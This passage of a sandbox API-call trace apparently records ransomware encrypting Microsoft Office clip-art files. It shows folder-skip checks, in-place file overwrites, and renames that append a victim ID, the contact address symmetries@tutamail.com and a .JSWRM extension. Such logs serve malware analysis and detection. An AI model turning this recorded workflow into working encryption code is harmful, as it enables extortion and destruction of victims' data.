(lpString1="SO00910_.WMF", lpString2="...") returned 1 [0096.885] lstrcmpiW (lpString1="SO00910_.WMF", lpString2="windows") returned -1 [0096.885] lstrcmpiW (lpString1="SO00910_.WMF", lpString2="recovery") returned 1 [0096.885] lstrcmpiW (lpString1="SO00910_.WMF", lpString2="perflogs") returned 1 [0096.885] lstrcmpiW (lpString1="SO00910_.WMF", lpString2="documents and settings") returned 1 [0096.885] lstrcmpiW (lpString1="SO00910_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.885] lstrcmpiW (lpString1="SO00910_.WMF", lpString2="system volume information") returned -1 [0096.885] lstrcmpiW (lpString1="SO00910_.WMF", lpString2="msocache") returned 1 [0096.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00910_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00910_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00910_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0096.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00910_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00910_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00910_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0096.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0096.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0096.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0096.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00910_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00910_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.927] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6296) returned 1 [0096.927] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1890) returned 0x205850 [0096.927] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1890, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1890, lpOverlapped=0x0) returned 1 [0096.929] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.929] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1890, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1890, lpOverlapped=0x0) returned 1 [0096.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.929] CloseHandle (hObject=0x314) returned 1 [0096.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0096.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0096.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0096.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0096.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0096.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0096.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.930] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00910_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00910_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00910_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00910_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0096.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0096.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0096.931] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00911_.WMF", cAlternateFileName="")) returned 1 [0096.931] lstrcmpiW (lpString1="SO00911_.WMF", lpString2=".") returned 1 [0096.931] lstrcmpiW (lpString1="SO00911_.WMF", lpString2="..") returned 1 [0096.931] lstrcmpiW (lpString1="SO00911_.WMF", lpString2="...") returned 1 [0096.931] lstrcmpiW (lpString1="SO00911_.WMF", lpString2="windows") returned -1 [0096.931] lstrcmpiW (lpString1="SO00911_.WMF", lpString2="recovery") returned 1 [0096.931] lstrcmpiW (lpString1="SO00911_.WMF", lpString2="perflogs") returned 1 [0096.931] lstrcmpiW (lpString1="SO00911_.WMF", lpString2="documents and settings") returned 1 [0096.931] lstrcmpiW (lpString1="SO00911_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.931] lstrcmpiW (lpString1="SO00911_.WMF", lpString2="system volume information") returned -1 [0096.931] lstrcmpiW (lpString1="SO00911_.WMF", lpString2="msocache") returned 1 [0096.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0096.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00911_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00911_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00911_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00911_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00911_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00911_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0096.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0096.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0096.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00911_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00911_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.932] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10744) returned 1 [0096.932] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29f0) returned 0x24d210 [0096.932] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x29f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x29f0, lpOverlapped=0x0) returned 1 [0096.937] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.937] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x29f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x29f0, lpOverlapped=0x0) returned 1 [0096.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.938] CloseHandle (hObject=0x314) returned 1 [0096.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0096.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0096.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0096.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0096.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0096.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0096.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.938] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00911_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00911_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00911_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00911_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0096.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0096.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0096.939] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00913_.WMF", cAlternateFileName="")) returned 1 [0096.939] lstrcmpiW (lpString1="SO00913_.WMF", lpString2=".") returned 1 [0096.939] lstrcmpiW (lpString1="SO00913_.WMF", lpString2="..") returned 1 [0096.939] lstrcmpiW (lpString1="SO00913_.WMF", lpString2="...") returned 1 [0096.939] lstrcmpiW (lpString1="SO00913_.WMF", lpString2="windows") returned -1 [0096.939] lstrcmpiW (lpString1="SO00913_.WMF", lpString2="recovery") returned 1 [0096.939] lstrcmpiW (lpString1="SO00913_.WMF", lpString2="perflogs") returned 1 [0096.939] lstrcmpiW (lpString1="SO00913_.WMF", lpString2="documents and settings") returned 1 [0096.939] lstrcmpiW (lpString1="SO00913_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.939] lstrcmpiW (lpString1="SO00913_.WMF", lpString2="system volume information") returned -1 [0096.939] lstrcmpiW (lpString1="SO00913_.WMF", lpString2="msocache") returned 1 [0096.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0096.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00913_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.939] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00913_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00913_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0096.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0096.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00913_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00913_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00913_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0096.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0096.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0096.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0096.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00913_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00913_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.940] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10420) returned 1 [0096.940] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x28b0) returned 0x24d210 [0096.940] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x28b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x28b0, lpOverlapped=0x0) returned 1 [0096.943] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.943] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x28b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x28b0, lpOverlapped=0x0) returned 1 [0096.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.943] CloseHandle (hObject=0x314) returned 1 [0096.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0096.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0096.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0096.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0096.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0096.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0096.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.943] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00913_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00913_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00913_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00913_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0096.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0096.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0096.944] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b0c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00914_.WMF", cAlternateFileName="")) returned 1 [0096.944] lstrcmpiW (lpString1="SO00914_.WMF", lpString2=".") returned 1 [0096.944] lstrcmpiW (lpString1="SO00914_.WMF", lpString2="..") returned 1 [0096.945] lstrcmpiW (lpString1="SO00914_.WMF", lpString2="...") returned 1 [0096.945] lstrcmpiW (lpString1="SO00914_.WMF", lpString2="windows") returned -1 [0096.945] lstrcmpiW (lpString1="SO00914_.WMF", lpString2="recovery") returned 1 [0096.945] lstrcmpiW (lpString1="SO00914_.WMF", lpString2="perflogs") returned 1 [0096.945] lstrcmpiW (lpString1="SO00914_.WMF", lpString2="documents and settings") returned 1 [0096.945] lstrcmpiW (lpString1="SO00914_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.945] lstrcmpiW (lpString1="SO00914_.WMF", lpString2="system volume information") returned -1 [0096.945] lstrcmpiW (lpString1="SO00914_.WMF", lpString2="msocache") returned 1 [0096.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0096.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00914_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00914_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00914_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0096.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0096.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00914_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00914_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00914_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0096.945] 